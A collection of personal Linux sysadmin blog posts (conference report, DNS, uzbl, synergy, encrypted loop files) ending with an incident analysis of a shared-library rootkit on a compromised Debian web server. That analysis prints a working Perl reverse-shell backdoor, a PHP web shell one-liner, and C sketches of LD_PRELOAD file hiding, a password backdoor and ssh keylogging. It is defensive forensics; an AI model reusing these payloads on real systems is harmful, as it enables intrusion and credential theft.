After paying just 80€ for the whole conference, 4 days, we started walking around the ground floor. There were many information desks of various projects, free PCs to use (loaded with Ubuntu), the huge lounge which included a bar for food and drinks with lots of seats for people and 2 rooms for presentations. On the upper floor there were many more projects and another large room for presentations.

What made BCC so lively were all these projects around the presentation rooms. There were always hundreds of people sitting outside of the presentation rooms hacking on their projects, discussing with other people, selling merchandise, etc. Because it was our first time in the conference we were not experienced enough to use our time wisely between the lectures so I only managed to visit very few projects, Cacert, Gentoo and Debian. I am sure that there were people who did not attend any lectures at all and just sat all day at their projects’ infodesk.

Before I continue with the presentations we went to, I want to make a note about the volunteers again. Volunteers at 26c3 were called angels and they did an EXCELLENT job. They would not allow you to sit wherever you liked at a lecture; they would try to find you a seat or they would put you in a place where you could stand without blocking others. Nobody was allowed to sit in the corridors, nobody. Everything was in order and I never once heard a single person complain about the angels’ policy. They were strict and firm on one hand but helpful, fair and polite on the other. They were probably the best volunteers I have ever come across anywhere. All of them were carrying an ID and a DECT phone on them to cooperate with other angels (oh yes, the conference had its own DECT network…AND its own GSM network!!!). Funny quote: angels at the entrance and exit doors wore t-shirts that read “Physical ACL”, heh.

The very first presentation we attended was “Here Be Electric Dragons”, and then we moved to see “Exposing Crypto bugs through reverse engineering”. After a break we tried to go to the “GSM: SRSLY?” lecture but it was SOO full that we were not allowed to go inside the presentation room. So we went to the “Tor and censorship: lessons learned” presentation, which was more interesting than I expected. The final talks we saw on the first day were “UNBILD – Pictures and Non-Pictures”, which was in German, and of course “cat /proc/sys/net/ipv4/fuckups”. Since none of us spoke German there was no urge to see the UNBILD lecture, but as we painfully understood by not even being able to enter the presentation room for the “GSM: SRSLY?” lecture, you have to go a LOT earlier to see a good lecture. We definitely wanted to see fabs’ lecture so we went there an hour earlier to find some seats. By the way, outside of the presentation rooms there were TVs with live streaming from inside, for people who couldn’t go inside or for people who didn’t want to. As I said earlier, a lot of people preferred sitting at their projects’ infodesk and watching the streams of the presentations.

On the next day we saw: “Milkymist“, “Advanced microcontroller programming“, “Fuzzing the Phone in your Phone“, “Defending the Poor, Preventing Flash exploits“, “Haste ma’n netblock?” and “SCCP hacking, attacking the SS7 & SIGTRAN applications one step further and mapping the phone system“.

On the third day just “Playing with the GSM RF Interface“, “Using OpenBSC for fuzzing of GSM handsets” and “Black Ops Of PKI” since we decided to do some sightseeing as well 🙂

Finally on the last day we went to “secuBT” and from that to another German lecture about a distributed portscanner called Wolpertinger that replaced a canceled lecture on IBM AS/400. Afterwards we went to the realtime English translation stream of “Security Nightmares” and to the “Closing Event“.

I had a really great time and I certainly want to be there again next year. If I manage to go there again though, I will try to take a lot more days off work so I can visit many more places around the city. The whole event was excellent, the organization was almost perfect and the people who contributed to it deserve a huge round of applause, especially the angels.

Congratulations to all.

Necessary pics: the lounge, Room 1, FX’s presentation, BCC at night, pirate flags, BCC with snow, the closing event, the Greeks.

P.S. I don’t want to go into specific details about the lectures I attended. Some were REALLY good, some were average and some were totally boring. If you follow the news you already know which streams of lectures you should certainly download and see. You can find every lecture on CCC’s FTP server.

P.S.2 What a great wiki for an event…I was amazed by the amount of information one can find in there…

P.S.3 To Greeks only…please download the closing event presentation to see how we should start organizing events. Just check out the efforts of the people who contributed to the 26c3 event. I don’t want to write anything more about this issue, because the difference from any Greek event I’ve ever attended, or even from the mentality of the people attending “our” events, is SO SO SO HUUUUGE that it makes me really sad. I hope that this might fire up something. If more Greeks attended events organized abroad then maybe one day we might get more serious about our events as well.

Epic fail from a hosting company involving bad customer support and a critical security issue

To cut the story as short as possible, let’s say that someone rents some dedicated servers at a big hosting company. I occasionally do some administrative tasks for him.
A server stopped responding and was unbootable on October 1st, one disk had crashed. Then the hosting company made a huge mistake, I notified them about it, and then they made another, even bigger mistake (a security issue) the next day, October 2nd. I re-notified them about it…
So you can either read the whole story, or if you are only interested in the security issue, skip the first day and go straight to October 2nd.

Some details, the server had 2 disks, sda with the OS (Debian 4.0) with Plesk control panel and sdb which had some backup files.

October 1st 2009:
10:10 I got a telephone call to help on that server because it looked dead and it couldn’t even be rebooted from the hosting company’s control panel.
10:15 I contacted the company’s support by email and notified them of the problem.

resolv.conf options rotate and discovery of ISP DNS issue

Lately I somehow bumped into the manpage of resolv.conf. While reading it I saw the following really nice option:

rotate               sets  RES_ROTATE  in _res.options, which causes round robin selection of name‐
                     servers from among those listed.  This has the effect of spreading  the  query
                     load  among  all  listed servers, rather than having all clients try the first
                     listed server first every time.

Since then my /etc/resolv.conf on both Gentoo and Debian looks like that:
nameserver 194.177.210.10
nameserver 194.177.210.210
nameserver 194.177.210.211
options rotate

(I prefer using GrNET‘s DNS servers over any others in Greece, especially for my laptop configuration. Since they allow recursion I can use them to avoid the lousy DNS services provided by lousy DSL routers, regardless of the ISP I am currently using when I am “mobile” with my laptop.)

While using the above config I issued a ping command on one terminal and a tcpdump command on another to see what was actually happening. The result looked like this:
root@lola:~# tcpdump -ni eth1 port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes
11:20:46.405694 IP 192.168.1.65.55154 > 194.177.210.210.53: 39212+ A? ntua.gr. (25)
11:20:46.444266 IP 194.177.210.210.53 > 192.168.1.65.55154: 39212* 1/5/8 A 147.102.222.210 (319)
11:20:46.484490 IP 192.168.1.65.56152 > 194.177.210.211.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.584171 IP 194.177.210.211.53 > 192.168.1.65.56152: 50452 ServFail 0/0/0 (46)
11:20:46.584449 IP 192.168.1.65.58597 > 194.177.210.10.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.624179 IP 194.177.210.10.53 > 192.168.1.65.58597: 50452 1/7/6 (357)
11:20:47.484420 IP 192.168.1.65.32818 > 194.177.210.10.53: 33179+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:47.524176 IP 194.177.210.10.53 > 192.168.1.65.32818: 33179 1/7/6 (357)
11:20:48.484483 IP 192.168.1.65.57670 > 194.177.210.210.53: 21949+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:48.524184 IP 194.177.210.210.53 > 192.168.1.65.57670: 21949 1/3/6 (271)
11:20:49.487610 IP 192.168.1.65.48966 > 194.177.210.211.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.534204 IP 194.177.210.211.53 > 192.168.1.65.48966: 8619 ServFail 0/0/0 (46)
11:20:49.534429 IP 192.168.1.65.49421 > 194.177.210.10.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.574138 IP 194.177.210.10.53 > 192.168.1.65.49421: 8619 1/7/6 (357)
11:20:50.494537 IP 192.168.1.65.52525 > 194.177.210.10.53: 3415+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:50.534145 IP 194.177.210.10.53 > 192.168.1.65.52525: 3415 1/7/6 (357)
11:20:51.494552 IP 192.168.1.65.40400 > 194.177.210.210.53: 4504+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:51.534205 IP 194.177.210.210.53 > 192.168.1.65.40400: 4504 1/3/6 (271)
11:20:52.494554 IP 192.168.1.65.42385 > 194.177.210.211.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.544197 IP 194.177.210.211.53 > 192.168.1.65.42385: 48450 ServFail 0/0/0 (46)
11:20:52.544409 IP 192.168.1.65.43773 > 194.177.210.10.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.584232 IP 194.177.210.10.53 > 192.168.1.65.43773: 48450 1/7/6 (357)

People who are used to reading tcpdump output will immediately point out the ServFail entries in the log. Server 194.177.210.211 failed to provide a proper answer for the PTR query of 210.222.102.147.in-addr.arpa.

Further investigation of the problem:

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.210
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 66841 IN  PTR achilles.noc.ntua.gr.

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.211
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.10
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 86115 IN  PTR achilles.noc.ntua.gr.

It was obvious that 2 out of 3 DNS servers responded as they should and the other did not.

What I did was notify a friend working as an administrator there (GrNET) about the problem. After some investigation, he later told me that the problem was related to dnssec issues, possibly a configuration error on RIPE‘s side. As far as I know they had to temporarily disable dnssec on the 147.102 zone…I am not aware whether they have fixed the problem (with dnssec enabled) yet though.

I am really glad they acted as fast as possible to solve the problem 🙂

Uzbl to you too!

I’ve been trying uzbl for the last few days and I am pretty impressed by how useful such a small application can be in certain use cases!

I installed it on my Debian testing using the following blog post: Installing uzbl on Debian Squeeze.
Be sure to run make install, else you’ll have no config and uzbl will be unusable!!!

The first place I used it was for the urlLauncher plugin of urxvt. On my .Xdefaults I have the following piece of code:
urxvt.perl-ext-common: default,matcher,-option-popup,-selection-popup,-readline
urxvt.matcher.button: 1
urxvt.urlLauncher: /usr/local/bin/urxvt-url.sh

and my /usr/local/bin/urxvt-url.sh contains:
#!/bin/sh
uzbl "$1"

Now every url on the console gets highlighted and I can open it with uzbl. And that means opening it really fast!

Example:
urxvt terminal (tabbed by fluxbox) with some urls highlighted by the perl matcher plugin of urxvt:
urxvt-url-highlight

left clicking on one of the urls opens it with uzbl:
uzbl-window

Apart from that, I’ve started using uzbl to open links from instant messengers, IRC clients and every other place where people send me links to check out, or wherever I need a fast browser instance. Some people might say that it looks like links2 graphical mode, but it’s NOT like opening urls with “links -G”, because uzbl is based on webkit and that means it can deal with javascript, java, flash, whatever…

I just love the way you can keybind all the actions you want…in the example config that comes with it, you quit the browser by typing ZZ…how great is that? 😀

Some usage tips
1) Tabbed behavior (if you have fluxbox):
In ~/.config/uzbl/config add
bind t _ = spawn uzbl --uri %s
and in ~/.fluxbox/apps add the [group] tag before the [app] tag for uzbl like that:

[group]
 [app] (name=uzbl) (class=Uzbl)
  [Workspace]   {0} 
  [Head]    {0} 
  [Dimensions]  {800 1284}
  [Position]    (UPPERLEFT) {0 0}
  [Maximized]   {yes}
  [Jump]    {yes}
  [Close]   {yes}
[end]

Now the command t www.google.com inside uzbl, will open a new tabbed window of uzbl with www.google.com loaded in it.

2) Close uzbl window with ctrl+w
In ~/.config/uzbl/config add:

bind     ctrl+v ctrl+w    = exit

(press ctrl+v ctrl+w one after the other and you will get something like ^W in the file)

P.S. If you are a person that just came from the point and click windows world to the beautiful world of linux, or you are a person that loves bloated desktop managers like KDE/gnome/etc or bloated applications like firefox/iceweasel/konqueror don’t even think of installing it. You’ll never understand its value…
P.S.2. If Richard Stallman decided to browse the web and had an internet connection uzbl would probably be his browser of choice 😛

Playing with Synergy on Gentoo and Debian

I currently have Gentoo/x86 on my desktop system and Debian/testing on my laptop. I wanted a way to use the laptop’s trackpad to control the cursor on the desktop, or the desktop’s mouse to control the cursor on the laptop. Thankfully I was able to do that with Synergy.

On Gentoo:
# emerge x11-misc/synergy
On Debian:
# aptitude install synergy

My config is pretty simple. That’s Debian’s (hostname lola) /etc/synergy.conf:

section: screens
    lola:
    athlios:
end

section: links
    lola:
        right = athlios
    athlios:
        left  = lola
end

section: aliases
    lola:
        mac 
end

When I want to control athlios (the desktop) from lola (the laptop), I start synergys on lola, ssh to athlios and start synergyc lola. That’s it, I can then control the desktop’s mouse and keyboard from the laptop’s touchpad and keyboard. When I move lola’s cursor far to the right, the cursor starts moving on the desktop, and if I start typing on the laptop’s keyboard I am actually typing on the desktop. Moving the cursor far to the left of the desktop’s monitor, the cursor starts moving on the laptop again.
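In plain commands the whole dance looks roughly like this (synergy 1.3.x here; --config simply points at the file shown above):

lola$ synergys --config /etc/synergy.conf
lola$ ssh athlios
athlios$ synergyc lola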

A problem I faced was that some keys (the Left and Down arrows) stop repeating if you press them continuously after synergyc has started. The solution is posted in the synergy article on the Gentoo wiki: you just have to type xset r 113 (left arrow) and xset r 116 (down arrow) to activate them, then move your mouse to the synergy server and back to the synergy client. If you try typing with the keyboard of the machine where the synergy client is running, you will see that repeating doesn’t work at all; just type xset r to get it back working if you need it.

For people having more than one machine on their desk, synergy is a real salvation in order to stop switching keyboards and mice all the time.

how to use encrypted loop files with a gpg passphrase in Debian

Fast howto (mostly a note for personal use) on what’s needed on Debian to use an encrypted loop:

1. The necessary utilities (patched losetup)
# aptitude install loop-aes-utils
2. The necessary kernel-module
# aptitude install loop-aes-modules-2.6.30-1-686-bigmem
3. Create the keyfile (keep your computer as busy as possible while doing this to increase entropy)
# head -c 2925 /dev/urandom | uuencode -m - | head -n 66 | tail -n 65| gpg --symmetric -a >/path/to/keyfile.gpg
4. Loopfile creation (~10MB; use the same path in the following steps)
# dd if=/dev/urandom of=/home/username/crypto-loop.img bs=1k count=10000
5. Initialize loopfile
# losetup -K /path/to/keyfile.gpg -e AES256 /dev/loop5 /home/username/crypto-loop.img
6. Format loopfile
# mke2fs /dev/loop5
7. Delete loop device
# losetup -d /dev/loop5
8. Create mount point for loopfile
# mkdir /mnt/crypto-loop
9. Add entry to fstab

/home/username/crypto-loop.img /mnt/crypto-loop ext2 defaults,noauto,user,loop=/dev/loop7,encryption=AES256,gpgkey=/path/to/keyfile.gpg 0 0

10. Try mounting the loopfile as user
$ mount /mnt/crypto-loop
11. Check it’s mounted properly
$ mount | grep -i aes

and use it!
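When you’re done, unmount it the same way (the “user” option in fstab lets the user who mounted it unmount it too):

$ umount /mnt/crypto-loop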

P.S. Secure your keyfile.gpg, if it gets lost you won’t _ever_ be able to decrypt what was inside crypto-loop.img!

There’s a rootkit in the closet!

Part 1: Finding the rootkit

It’s Monday morning and I am out for coffee in downtown Thessaloniki when a partner calls:
– On machine XXX mysqld hasn’t been starting since Saturday.
– Can I drink my coffee and come over later to check it? Is it critical?
– Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a Debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running in ps, so I try starting it via the init.d script. Nothing…it hangs while trying to start it. I suspect a failing disk, so I use tune2fs -C 50 /dev/hda1 to force an e2fsck on boot and reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at the login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda: all clear, no errors found. Then I try to start mysqld manually; it looks like it starts, but when I try to connect to it via a mysql client I get no response. I try to move the /var/lib/mysql/ files to another location and re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. The apt-get process tries to stop mysqld before replacing it with the older version and it hangs; I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe; killall -9 mysql; killall -9 mysqladmin it finally moves on, but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I run ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ld-linuxv.so.1 in the output. I had never heard of that library name before, so I google it. Nothing comes up. I check the output of ldd /usr/sbin/mysqld on another Debian etch box I have, and no /lib/ld-linuxv.so.1 library shows up there. I am definitely looking at something that shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find the file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*; the rootkit has probably patched the functions that would allow me to see it. Strangely though, I was able to see it with ldd (more about the technical stuff in the second half of the post). I check some other executables in /usr/sbin with a for i in /usr/sbin/*; do ldd $i; done, and all of them appear to have /lib/ld-linuxv.so.1 as a library dependency. I try to reboot the box with a kernel other than the one it’s currently using, but I get strange errors that it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt to boot the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced, of course. When the apt-get procedure calls mkinitramfs in order to create the initramfs image, I notice errors saying that it can’t delete the /tmp/mkinitramfs_UVWXYZ/lib/ld-linuxv.so.1 file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis
I. First look at the ld-linuxv.so.1 library

A couple of days later I put the disk into my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that ld-linuxv.so.1 was there. I ran strings on it:
# strings /lib/ld-linuxv.so.1
__gmon_start__
_init
_fini
__cxa_finalize
_Jv_RegisterClasses
execve
dlsym
fopen
fprintf
fclose
puts
system
crypt
strdup
readdir64
strstr
__xstat64
__errno_location
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
vasprintf
getspnam_r
getspnam
getpwnam
pam_authenticate
inssh
gotpass
__libc_start_main
logit
setuid
setgid
seteuid
setegid
read
fwrite
accept
htons
doshell
doconnect
fork
dup2
stdout
fflush
stdin
fscanf
sleep
exit
waitpid
socket
libdl.so.2
libc.so.6
_edata
__bss_start
_end
GLIBC_2.0
GLIBC_2.1.3
GLIBC_2.1
root
@^_]
`^_]
ld.so.preload
ld-linuxv.so.1
_so_cache
execve
/var/opt/_so_cache/ld
%s:%s
Welcome master
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
lastlog
pam_open_session
pam_close_session
syslog
getspnam_r
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
getspnam
getpwnam
root
/dev/null
normal
pam_authenticate
pam_get_item
Password:
__libc_start_main
/var/opt/_so_cache/lc
local
/usr/sbin/sshd
/bin/sh
read
write
accept
/usr/sbin/crond
HISTFILE=/dev/null
%99s
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
/bin/sh

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted on the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) thought that we were dealing with a kernel rootkit. However, after carefully studying the disassembled dead listing of ld-linuxv.so.1, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ld.so.preload file on the system with just one entry: the path where he saved the ld-linuxv.so.1 shared library, namely /lib/ld-linuxv.so.1. This has the effect of preloading ld-linuxv.so.1 every single time a dynamically linked executable is run by a user. Using the well-known dlsym(RTLD_NEXT, symbol) technique, which returns the run-time address of the next occurrence of the symbol after the current library in the search order and therefore allows wrappers to be built around the real functions, the ld-linuxv.so.1 shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks, with brief explanations of what some of them do; a minimal sketch of the wrapping technique follows the list:
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
getspnam_r
getspnam
getpwnam
pam_authenticate
pam_get_item
__libc_start_main
read
write
accept
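
To make the technique concrete, here is a minimal sketch (not the rootkit’s recovered source) of how a preloaded library can hijack readdir64() with dlsym(RTLD_NEXT, …) to hide chosen file names from directory listings; the file name hide.c, the build line and the hidden names are just assumptions for the example:

/* hide.c -- illustrative only: a preloaded library that wraps readdir64()
 * to hide chosen file names from directory listings.
 * Build: gcc -shared -fPIC -o hide.so hide.c -ldl
 * Activate via /etc/ld.so.preload (or LD_PRELOAD=./hide.so for testing).
 */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <stddef.h>

struct dirent64 *readdir64(DIR *dirp)
{
    /* Resolve the real readdir64() that comes after us in the search order. */
    static struct dirent64 *(*real_readdir64)(DIR *) = NULL;
    if (real_readdir64 == NULL)
        real_readdir64 = (struct dirent64 *(*)(DIR *))dlsym(RTLD_NEXT, "readdir64");

    struct dirent64 *entry;
    while ((entry = real_readdir64(dirp)) != NULL) {
        /* Silently skip the entries we want to hide (names are illustrative). */
        if (strstr(entry->d_name, "ld-linuxv.so.1") == NULL &&
            strstr(entry->d_name, "_so_cache") == NULL)
            return entry;
    }
    return NULL; /* end of directory */
}

A wrapper like this would explain why ls /lib and echo /lib/* could not see the file on the running system, while ldd, which asks the dynamic linker itself to report the objects it maps, still listed it.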

The hijacked accept() function spawns a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection on port 80, but only if that IP address is a specific, hardcoded one; afterwards it calls the original accept(). The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”), effectively giving the attacker a master password; a sketch of this part is shown below. The hijacked read() and write() functions wrap the corresponding calls and, if the current process is ssh (client or daemon), append their buffers to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.
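
As an illustration of the password backdoor (again a sketch, assuming the same wrapping pattern as the readdir64 example above, not the recovered source), a hijacked getspnam() only needs to call the real function and overwrite the returned hash:

/* Illustrative getspnam() backdoor: the hash is the one found in the
 * strings output above; the surrounding code is an assumption.
 * Build the same way as the previous example. */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <shadow.h>
#include <stddef.h>

struct spwd *getspnam(const char *name)
{
    static struct spwd *(*real_getspnam)(const char *) = NULL;
    if (real_getspnam == NULL)
        real_getspnam = (struct spwd *(*)(const char *))dlsym(RTLD_NEXT, "getspnam");

    struct spwd *sp = real_getspnam(name);
    if (sp != NULL) {
        /* Replace the stored hash: password checks against this entry now
         * succeed only for the attacker's password. (The real rootkit is
         * most likely more selective about when it does this.) */
        sp->sp_pwdp = "$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0";
    }
    return sp;
}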

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t reveal anything at first sight, nothing really stood out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I found these entries at the bottom:

--01:05:38-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext' (Permission denied).
--01:05:51-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) - `foobar.ext' saved [695/695]

--01:17:14-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext' (Permission denied).
--01:17:26-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) - `foobar.ext' saved [695/695]

So this was the entry point: someone got into the box through a web application and was able to run code.
I downloaded foobar.ext from the same URL and it turned out to be a Perl script.

#!/usr/bin/perl
# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print "[*] Dumping Arguments\n";

# Attacker's host/port (anonymized here)
$host = "A.B.C.D";
$port = XYZ;

if ($ARGV[1]) {
    $port = $ARGV[1];
}

print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n");

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die("[-] Socket Error\n");

my $target = inet_aton($host);

# Connect back to the attacker's machine
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("[-] Unable to Connect\n");
}

print "[*] Spawning Shell\n";

# Attach a shell to the socket; the '-bash' argv[0] disguises it as a login shell
if (!fork()) {
    open(STDIN, ">&SERVER");
    open(STDOUT, ">&SERVER");
    open(STDERR, ">&SERVER");
    exec {'/bin/sh'} '-bash' . "\0" x 4;
    exit(0);
}

Since I had the exact time when foobar.ext was downloaded, I looked again at the apache2 access.log to see what was going on at that time.
Here are some entries:

A.B.C.D - - [15/Aug/2009:01:05:33 +0300] "GET http://www.domain.com/admin/ HTTP/1.1" 302 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:34 +0300] "POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1" 200 303 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:34 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 131 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:38 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:47 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 52 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:50 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:51 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 59 "-" "Mozilla Firefox"

The second entry, the POST, looks pretty suspicious. I opened the admin/record_company.php file and discovered that it is part of Zen Cart. The first result when googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This allows an attacker to run arbitrary commands with the account of the user running the apache2 server: whatever is placed in a Shell: HTTP request header (which PHP exposes as $_SERVER["HTTP_SHELL"]) is passed straight to system().

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to make the server run foobar.ext, which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Being root, he uploaded/compiled ld-linuxv.so.1 and created /etc/ld.so.preload. From then on, every dynamically linked executable would first load this “trojaned” library, which gives him backdoor access to the box and hides itself from the system. So there is his rootkit 🙂

Fortunately the rootkit had problems: if the /var/opt/_so_cache/ directory had not been created manually, it couldn’t write the lc and ld files inside it. Only once the _so_cache directory was created did it start logging; the sketch below shows how such a failure mode can come about.
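
Here is a minimal sketch of the ssh traffic logger (illustrative only, under the assumption that the wrapper opens the log file on every call, which would match the observed behaviour of silently losing data when the directory is missing):

/* Illustrative write() wrapper: append ssh client traffic to the hidden
 * log file. If /var/opt/_so_cache/ does not exist, fopen() fails and the
 * data is silently dropped -- which is what was observed on this box. */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <errno.h>   /* program_invocation_short_name (glibc) */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

ssize_t write(int fd, const void *buf, size_t count)
{
    static ssize_t (*real_write)(int, const void *, size_t) = NULL;
    static __thread int in_hook = 0;
    if (real_write == NULL)
        real_write = (ssize_t (*)(int, const void *, size_t))dlsym(RTLD_NEXT, "write");

    /* Only log the ssh client here; incoming sshd traffic would go to .../ld. */
    if (!in_hook && strcmp(program_invocation_short_name, "ssh") == 0) {
        in_hook = 1;  /* guard against re-entering ourselves via stdio */
        FILE *log = fopen("/var/opt/_so_cache/lc", "a");
        if (log != NULL) {   /* fails silently when the directory is missing */
            fwrite(buf, 1, count, log);
            fclose(log);
        }
        in_hook = 0;
    }
    return real_write(fd, buf, count);
}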

Any further discoveries about the rootkit will be published in a new post. If someone else wants to analyze the rootkit, I would be more than happy if they posted a link to their analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the ld-linuxv.so.1 library and the Perl script foobar.ext (use at your own risk; the attacker’s host/IP have been removed from the Perl script): linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs